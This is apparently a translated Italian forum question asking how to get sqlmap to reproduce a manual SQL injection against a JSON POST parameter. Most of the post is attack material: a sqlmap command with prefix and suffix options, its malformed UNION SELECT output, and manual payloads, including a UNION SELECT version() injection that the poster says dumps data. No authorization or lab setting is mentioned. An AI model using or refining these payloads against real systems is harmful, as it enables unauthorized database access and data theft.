Voglio eseguire l'iniezione SQL ma non so come usare il comando. Finora, ho provato questo:
--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv'
Uso '
anziché "
nel parametro perché i dati del post di sqlmap devono essere in formato --data="paramter goes here"
.
Ma l'ultimo spettacolo verboso:
{'user_id':'6','\'user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#''}
Dovrebbe essere:
{'user_id':'6','user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#'}
Ecco il mio modo manuale:
{"user_id":"6","user_with":"5"} -> return normal
{"user_id":"6","user_with":"5'"} -> return 'You have an error...'
{"user_id":"6","user_with":"5 OR user_to = 5) union select version(),2,3,4,5,6#"} -> return dump data
Quindi, come eseguire ciò che voglio in sqlmap?